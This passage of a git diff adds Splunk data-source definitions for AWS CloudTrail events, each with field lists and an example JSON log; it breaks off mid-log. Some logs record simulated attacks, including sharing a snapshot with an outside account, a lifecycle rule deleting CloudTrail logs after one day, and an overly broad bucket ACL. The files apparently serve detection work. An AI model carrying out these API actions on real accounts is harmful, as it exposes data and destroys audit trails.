+example_log: '{"eventVersion": "1.08", "userIdentity": {"accountId": "111111111111",
+  "invokedBy": "s3.amazonaws.com"}, "eventTime": "2023-04-24T23:51:17Z", "eventSource":
+  "s3.amazonaws.com", "eventName": "JobCreated", "awsRegion": "us-west-2", "sourceIPAddress":
+  "s3.amazonaws.com", "userAgent": "s3.amazonaws.com", "requestParameters": null,
+  "responseElements": null, "eventID": "894153ad-ed86-4719-bb66-6c52ef7dc767", "readOnly":
+  false, "eventType": "AwsServiceEvent", "managementEvent": true, "recipientAccountId":
+  "111111111111", "serviceEventDetails": {"jobId": "bb54efd8-937d-4f0c-967d-aa8443998dac",
+  "jobArn": "arn:aws:s3:us-west-2:111111111111:job/bb54efd8-937d-4f0c-967d-aa8443998dac",
+  "status": "New", "jobEventId": "4e70d2f1053c07a79d9be9a14e486020", "failureCodes":
+  [], "statusChangeReason": []}, "eventCategory": "Management"}'
diff --git a/data_sources/aws_cloudtrail_modifydbinstance.yml b/data_sources/aws_cloudtrail_modifydbinstance.yml
new file mode 100644
index 0000000000..577d375168
--- /dev/null
+++ b/data_sources/aws_cloudtrail_modifydbinstance.yml
@@ -0,0 +1,193 @@
+name: AWS CloudTrail ModifyDBInstance
+id: bfa2912d-1a33-4b05-be46-543874d68241
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail ModifyDBInstance
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.allowMajorVersionUpgrade
+- requestParameters.applyImmediately
+- requestParameters.dBInstanceIdentifier
+- requestParameters.deletionProtection
+- requestParameters.masterUserPassword
+- responseElements.allocatedStorage
+- responseElements.autoMinorVersionUpgrade
+- responseElements.availabilityZone
+- responseElements.backupRetentionPeriod
+- responseElements.backupTarget
+- responseElements.cACertificateIdentifier
+- responseElements.copyTagsToSnapshot
+- responseElements.customerOwnedIpEnabled
+- responseElements.dBInstanceArn
+- responseElements.dBInstanceClass
+- responseElements.dBInstanceIdentifier
+- responseElements.dBInstanceStatus
+- responseElements.dBParameterGroups{}.dBParameterGroupName
+- responseElements.dBParameterGroups{}.parameterApplyStatus
+- responseElements.dBSubnetGroup.dBSubnetGroupDescription
+- responseElements.dBSubnetGroup.dBSubnetGroupName
+- responseElements.dBSubnetGroup.subnetGroupStatus
+- responseElements.dBSubnetGroup.subnets{}.subnetAvailabilityZone.name
+- responseElements.dBSubnetGroup.subnets{}.subnetIdentifier
+- responseElements.dBSubnetGroup.subnets{}.subnetStatus
+- responseElements.dBSubnetGroup.vpcId
+- responseElements.dbInstancePort
+- responseElements.dbiResourceId
+- responseElements.deletionProtection
+- responseElements.endpoint.address
+- responseElements.endpoint.hostedZoneId
+- responseElements.endpoint.port
+- responseElements.engine
+- responseElements.engineVersion
+- responseElements.enhancedMonitoringResourceArn
+- responseElements.httpEndpointEnabled
+- responseElements.iAMDatabaseAuthenticationEnabled
+- responseElements.instanceCreateTime
+- responseElements.kmsKeyId
+- responseElements.latestRestorableTime
+- responseElements.licenseModel
+- responseElements.masterUsername
+- responseElements.monitoringInterval
+- responseElements.monitoringRoleArn
+- responseElements.multiAZ
+- responseElements.networkType
+- responseElements.optionGroupMemberships{}.optionGroupName
+- responseElements.optionGroupMemberships{}.status
+- responseElements.pendingModifiedValues.masterUserPassword
+- responseElements.performanceInsightsEnabled
+- responseElements.performanceInsightsKMSKeyId
+- responseElements.performanceInsightsRetentionPeriod
+- responseElements.preferredBackupWindow
+- responseElements.preferredMaintenanceWindow
+- responseElements.publiclyAccessible
+- responseElements.storageEncrypted
+- responseElements.storageThroughput
+- responseElements.storageType
+- responseElements.vpcSecurityGroups{}.status
+- responseElements.vpcSecurityGroups{}.vpcSecurityGroupId
+- sessionCredentialFromConsole
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+  "AROAYTOGP2RLDF6WP4HD6:gowthamarajr@splunk.com", "arn": "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f/gowthamarajr@splunk.com",
+  "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLAKJDBQGB", "sessionContext":
+  {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLDF6WP4HD6", "arn":
+  "arn:aws:iam::111111111111:role/aws-reserved/sso.amazonaws.com/us-west-2/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f",
+  "accountId": "111111111111", "userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"},
+  "webIdFederationData": {}, "attributes": {"creationDate": "2022-08-05T08:47:55Z",
+  "mfaAuthenticated": "false"}}}, "eventTime": "2022-08-05T09:19:15Z", "eventSource":
+  "rds.amazonaws.com", "eventName": "ModifyDBInstance", "awsRegion": "us-west-2",
+  "sourceIPAddress": "AWS Internal", "userAgent": "AWS Internal", "requestParameters":
+  {"dBInstanceIdentifier": "database-1", "applyImmediately": true, "masterUserPassword":
+  "****", "allowMajorVersionUpgrade": false, "deletionProtection": true}, "responseElements":
+  {"dBInstanceIdentifier": "database-1", "dBInstanceClass": "db.m6g.large", "engine":
+  "postgres", "dBInstanceStatus": "available", "masterUsername": "postgres", "endpoint":
+  {"address": "database-1.ce6wk5bvtc0t.us-west-2.rds.amazonaws.com", "port": 5432,
+  "hostedZoneId": "Z1PVIF0B656C1W"}, "allocatedStorage": 5, "instanceCreateTime":
+  "Aug 5, 2022 9:02:51 AM", "preferredBackupWindow": "06:35-07:05", "backupRetentionPeriod":
+  7, "dBSecurityGroups": [], "vpcSecurityGroups": [{"vpcSecurityGroupId": "sg-46cfd020",
+  "status": "active"}], "dBParameterGroups": [{"dBParameterGroupName": "default.postgres14",
+  "parameterApplyStatus": "in-sync"}], "availabilityZone": "us-west-2a", "dBSubnetGroup":
+  {"dBSubnetGroupName": "default", "dBSubnetGroupDescription": "default", "vpcId":
+  "vpc-5f02343b", "subnetGroupStatus": "Complete", "subnets": [{"subnetIdentifier":
+  "subnet-43225f35", "subnetAvailabilityZone": {"name": "us-west-2b"}, "subnetOutpost":
+  {}, "subnetStatus": "Active"}, {"subnetIdentifier": "subnet-e55d7881", "subnetAvailabilityZone":
+  {"name": "us-west-2a"}, "subnetOutpost": {}, "subnetStatus": "Active"}, {"subnetIdentifier":
+  "subnet-0beddb972f034bdaa", "subnetAvailabilityZone": {"name": "us-west-2c"}, "subnetOutpost":
+  {}, "subnetStatus": "Active"}, {"subnetIdentifier": "subnet-2d70cd75", "subnetAvailabilityZone":
+  {"name": "us-west-2c"}, "subnetOutpost": {}, "subnetStatus": "Active"}]}, "preferredMaintenanceWindow":
+  "sat:11:44-sat:12:14", "pendingModifiedValues": {"masterUserPassword": "****"},
+  "latestRestorableTime": "Aug 5, 2022 9:12:31 AM", "multiAZ": false, "engineVersion":
+  "14.2", "autoMinorVersionUpgrade": true, "readReplicaDBInstanceIdentifiers": [],
+  "licenseModel": "postgresql-license", "storageThroughput": 0, "optionGroupMemberships":
+  [{"optionGroupName": "default:postgres-14", "status": "in-sync"}], "publiclyAccessible":
+  false, "storageType": "standard", "dbInstancePort": 0, "storageEncrypted": true,
+  "kmsKeyId": "arn:aws:kms:us-west-2:111111111111:key/318bcd5d-c453-489d-b63a-07753eab0623",
+  "dbiResourceId": "db-IX2K4LYFLBVZDHBYNPEAVFHFQM", "cACertificateIdentifier": "rds-ca-2019",
+  "domainMemberships": [], "copyTagsToSnapshot": true, "monitoringInterval": 60, "enhancedMonitoringResourceArn":
+  "arn:aws:logs:us-west-2:111111111111:log-group:RDSOSMetrics:log-stream:db-IX2K4LYFLBVZDHBYNPEAVFHFQM",
+  "monitoringRoleArn": "arn:aws:iam::111111111111:role/rds-monitoring-role", "dBInstanceArn":
+  "arn:aws:rds:us-west-2:111111111111:db:database-1", "iAMDatabaseAuthenticationEnabled":
+  false, "performanceInsightsEnabled": true, "performanceInsightsKMSKeyId": "arn:aws:kms:us-west-2:111111111111:key/318bcd5d-c453-489d-b63a-07753eab0623",
+  "performanceInsightsRetentionPeriod": 7, "deletionProtection": true, "associatedRoles":
+  [], "httpEndpointEnabled": false, "tagList": [], "customerOwnedIpEnabled": false,
+  "networkType": "IPV4", "backupTarget": "region"}, "requestID": "59e6b621-2f12-415b-bde4-21fa2dc7c113",
+  "eventID": "46351ca1-760e-4eef-b3ff-19723e13fbf8", "readOnly": false, "eventType":
+  "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory":
+  "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/aws_cloudtrail_modifyimageattribute.yml b/data_sources/aws_cloudtrail_modifyimageattribute.yml
new file mode 100644
index 0000000000..3b1b59efe1
--- /dev/null
+++ b/data_sources/aws_cloudtrail_modifyimageattribute.yml
@@ -0,0 +1,108 @@
+name: AWS CloudTrail ModifyImageAttribute
+id: 667c2115-8082-419e-b541-8150066bda4d
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail ModifyImageAttribute
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.attributeType
+- requestParameters.imageId
+- requestParameters.launchPermission.add.items{}.userId
+- responseElements._return
+- responseElements.requestId
+- sessionCredentialFromConsole
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+  "AROAYTOGP2RLDF6WP4HD6:bonobo@bo.com", "arn": "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f/bonobo@bo.com",
+  "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLBHIEEEPN", "sessionContext":
+  {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLDF6WP4HD6", "arn":
+  "arn:aws:iam::111111111111:role/aws-reserved/sso.amazonaws.com/us-west-2/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f",
+  "accountId": "111111111111", "userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"},
+  "webIdFederationData": {}, "attributes": {"creationDate": "2023-03-23T19:27:44Z",
+  "mfaAuthenticated": "false"}}}, "eventTime": "2023-03-23T21:47:28Z", "eventSource":
+  "ec2.amazonaws.com", "eventName": "ModifyImageAttribute", "awsRegion": "us-west-2",
+  "sourceIPAddress": "72.135.245.10", "userAgent": "AWS Internal", "requestParameters":
+  {"imageId": "ami-06dac31db29508566", "launchPermission": {"add": {"items": [{"userId":
+  "140429656527"}]}}, "attributeType": "launchPermission"}, "responseElements": {"requestId":
+  "84c431ce-6268-4218-aaf8-b4cdc1cd4055", "_return": true}, "requestID": "84c431ce-6268-4218-aaf8-b4cdc1cd4055",
+  "eventID": "957e1b12-ea17-4006-aefd-20677ace72b8", "readOnly": false, "eventType":
+  "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory":
+  "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/aws_cloudtrail_modifysnapshotattribute.yml b/data_sources/aws_cloudtrail_modifysnapshotattribute.yml
new file mode 100644
index 0000000000..a2c70947e4
--- /dev/null
+++ b/data_sources/aws_cloudtrail_modifysnapshotattribute.yml
@@ -0,0 +1,101 @@
+name: AWS CloudTrail ModifySnapshotAttribute
+id: 7e5aa947-3a0d-4ee5-b800-0c10b555da05
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail ModifySnapshotAttribute
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.attributeType
+- requestParameters.createVolumePermission.add.items{}.userId
+- requestParameters.snapshotId
+- responseElements._return
+- responseElements.requestId
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLCNEAQXWZV", "arn": "arn:aws:iam::111111111111:user/bhavin_console",
+  "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLF5EAXXXX", "userName":
+  "bhavin_console"}, "eventTime": "2023-03-20T22:31:36Z", "eventSource": "ec2.amazonaws.com",
+  "eventName": "ModifySnapshotAttribute", "awsRegion": "us-west-2", "sourceIPAddress":
+  "72.135.1.1", "userAgent": "stratus-red-team_46665bb8-dc15-4aba-a5ad-a362772b3f0d",
+  "requestParameters": {"snapshotId": "snap-02effb3bb62786b18", "createVolumePermission":
+  {"add": {"items": [{"userId": "012345678912"}]}}, "attributeType": "CREATE_VOLUME_PERMISSION"},
+  "responseElements": {"requestId": "f58433e6-a7f4-4e63-9cba-7ecc60ab74b2", "_return":
+  true}, "requestID": "f58433e6-a7f4-4e63-9cba-7ecc60ab74b2", "eventID": "62e027d3-7191-48f4-b5fe-4b66c58b3008",
+  "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+  "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2",
+  "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "ec2.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_putbucketacl.yml b/data_sources/aws_cloudtrail_putbucketacl.yml
new file mode 100644
index 0000000000..c3deffdc38
--- /dev/null
+++ b/data_sources/aws_cloudtrail_putbucketacl.yml
@@ -0,0 +1,116 @@
+name: AWS CloudTrail PutBucketAcl
+id: 28fffbfd-d98d-4a42-990b-b04ab47422eb
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail PutBucketAcl
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- additionalEventData.AuthenticationMethod
+- additionalEventData.CipherSuite
+- additionalEventData.SignatureVersion
+- additionalEventData.bytesTransferredIn
+- additionalEventData.bytesTransferredOut
+- additionalEventData.x-amz-id-2
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object
+- object_category
+- object_id
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.Host
+- requestParameters.accessControlList.x-amz-grant-write-acp
+- requestParameters.acl
+- requestParameters.bucketName
+- resources{}.ARN
+- resources{}.accountId
+- resources{}.type
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_user
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLNALZHZ6KX", "arn": "arn:aws:iam::111111111111:user/patrick_cli", "accountId":
+  "111111111111", "accessKeyId": "AKIAYTOGP2RLJ2OYSF6E", "userName": "patrick_cli"},
+  "eventTime": "2021-01-12T14:03:17Z", "eventSource": "s3.amazonaws.com", "eventName":
+  "PutBucketAcl", "awsRegion": "eu-central-1", "sourceIPAddress": "95.90.199.65",
+  "userAgent": "[aws-cli/2.0.45 Python/3.7.4 Darwin/20.2.0 exe/x86_64 command/s3api.put-bucket-acl]",
+  "requestParameters": {"bucketName": "patricktestbucket19", "Host": "patricktestbucket19.s3.eu-central-1.amazonaws.com",
+  "acl": "", "accessControlList": {"x-amz-grant-write-acp": "uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers"}},
+  "responseElements": null, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite":
+  "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 0, "AuthenticationMethod":
+  "AuthHeader", "x-amz-id-2": "qb+xR18y4+4serdq8conds+tNROklOFRYciGHof4z1pcnTnT9SCrx6iYHuupPNaiMnZ9kdB43yE=",
+  "bytesTransferredOut": 0}, "requestID": "23FAB394417ECFCD", "eventID": "9feee3c9-711f-4f7d-af4c-992907a2a521",
+  "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::S3::Bucket",
+  "ARN": "arn:aws:s3:::patricktestbucket19"}], "eventType": "AwsApiCall", "managementEvent":
+  true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/aws_cloudtrail_putbucketlifecycle.yml b/data_sources/aws_cloudtrail_putbucketlifecycle.yml
new file mode 100644
index 0000000000..d392e87cdd
--- /dev/null
+++ b/data_sources/aws_cloudtrail_putbucketlifecycle.yml
@@ -0,0 +1,120 @@
+name: AWS CloudTrail PutBucketLifecycle
+id: 1c73e954-87b6-4bd7-ac6a-5db7c4082b22
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail PutBucketLifecycle
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- additionalEventData.AuthenticationMethod
+- additionalEventData.CipherSuite
+- additionalEventData.SignatureVersion
+- additionalEventData.bytesTransferredIn
+- additionalEventData.bytesTransferredOut
+- additionalEventData.x-amz-id-2
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object
+- object_category
+- object_id
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.Host
+- requestParameters.LifecycleConfiguration.Rule.Expiration.Days
+- requestParameters.LifecycleConfiguration.Rule.Filter.Prefix
+- requestParameters.LifecycleConfiguration.Rule.ID
+- requestParameters.LifecycleConfiguration.Rule.Status
+- requestParameters.LifecycleConfiguration.xmlns
+- requestParameters.bucketName
+- requestParameters.lifecycle
+- resources{}.ARN
+- resources{}.accountId
+- resources{}.type
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId":
+  "111111111111", "accessKeyId": "AKIAYTOGP2RLKQ3U2PDY", "userName": "bhavin_cli"},
+  "eventTime": "2022-07-13T21:58:27Z", "eventSource": "s3.amazonaws.com", "eventName":
+  "PutBucketLifecycle", "awsRegion": "us-west-2", "sourceIPAddress": "192.184.242.57",
+  "userAgent": "[stratus-red-team_d73089cf-1905-430c-b6d3-4dc4d669190f]", "requestParameters":
+  {"lifecycle": "", "bucketName": "my-cloudtrail-bucket-alfsujjpnbpguqrh", "LifecycleConfiguration":
+  {"xmlns": "http://s3.amazonaws.com/doc/2006-03-01/", "Rule": {"Status": "Enabled",
+  "Filter": {"Prefix": "*"}, "Expiration": {"Days": 1}, "ID": "nuke-cloudtrail-logs-after-1-day"}},
+  "Host": "my-cloudtrail-bucket-alfsujjpnbpguqrh.s3.us-west-2.amazonaws.com"}, "responseElements":
+  null, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite": "ECDHE-RSA-AES128-GCM-SHA256",
+  "bytesTransferredIn": 249, "AuthenticationMethod": "AuthHeader", "x-amz-id-2": "TVXZE5kOVTMLqYlmKK+j/5g6flwkiFXFfw8PyNivFO4/9YXnDsyzFlGEzAy2rukTTiukLdEwtuM=",
+  "bytesTransferredOut": 0}, "requestID": "1P8X27T2BCMY93Y9", "eventID": "25d92cd1-f366-4b11-b408-967a17ce70f3",
+  "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::S3::Bucket",
+  "ARN": "arn:aws:s3:::my-cloudtrail-bucket-alfsujjpnbpguqrh"}], "eventType": "AwsApiCall",
+  "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory":
+  "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256",
+  "clientProvidedHostHeader": "my-cloudtrail-bucket-alfsujjpnbpguqrh.s3.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_putbucketreplication.yml b/data_sources/aws_cloudtrail_putbucketreplication.yml
new file mode 100644
index 0000000000..b0863404ed
--- /dev/null
+++ b/data_sources/aws_cloudtrail_putbucketreplication.yml
@@ -0,0 +1,141 @@
+name: AWS CloudTrail PutBucketReplication
+id: 0e1362eb-e592-419f-8fa5-556d3a122417
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail PutBucketReplication
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- additionalEventData.AuthenticationMethod
+- additionalEventData.CipherSuite
+- additionalEventData.SignatureVersion
+- additionalEventData.bytesTransferredIn
+- additionalEventData.bytesTransferredOut
+- additionalEventData.x-amz-id-2
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object
+- object_category
+- object_id
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.Host
+- requestParameters.ReplicationConfiguration.Role
+- requestParameters.ReplicationConfiguration.Rule.DeleteMarkerReplication.Status
+- requestParameters.ReplicationConfiguration.Rule.Destination.Bucket
+- requestParameters.ReplicationConfiguration.Rule.Filter
+- requestParameters.ReplicationConfiguration.Rule.ID
+- requestParameters.ReplicationConfiguration.Rule.Priority
+- requestParameters.ReplicationConfiguration.Rule.Status
+- requestParameters.ReplicationConfiguration.xmlns
+- requestParameters.bucketName
+- requestParameters.replication
+- resources{}.ARN
+- resources{}.accountId
+- resources{}.type
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+- vpcEndpointId
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+  "AROAYTOGP2RLDF6WP4H11:bpatel@splunk.com", "arn": "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f/bpatel@splunk.com",
+  "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLJOVYQHW2", "sessionContext":
+  {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLDF6WP4H11", "arn":
+  "arn:aws:iam::111111111111:role/aws-reserved/sso.amazonaws.com/us-west-2/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f",
+  "accountId": "111111111111", "userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"},
+  "webIdFederationData": {}, "attributes": {"creationDate": "2023-04-24T23:45:42Z",
+  "mfaAuthenticated": "false"}}}, "eventTime": "2023-04-24T23:49:33Z", "eventSource":
+  "s3.amazonaws.com", "eventName": "PutBucketReplication", "awsRegion": "us-west-2",
+  "sourceIPAddress": "23.93.193.6", "userAgent": "[S3Console/0.4, aws-internal/3 aws-sdk-java/1.11.1030
+  Linux/5.4.238-155.347.amzn2int.x86_64 OpenJDK_64-Bit_Server_VM/25.362-b10 java/1.8.0_362
+  vendor/Oracle_Corporation cfg/retry-mode/standard]", "requestParameters": {"replication":
+  "", "bucketName": "git-wild-hunt-results", "Host": "s3.us-west-2.amazonaws.com",
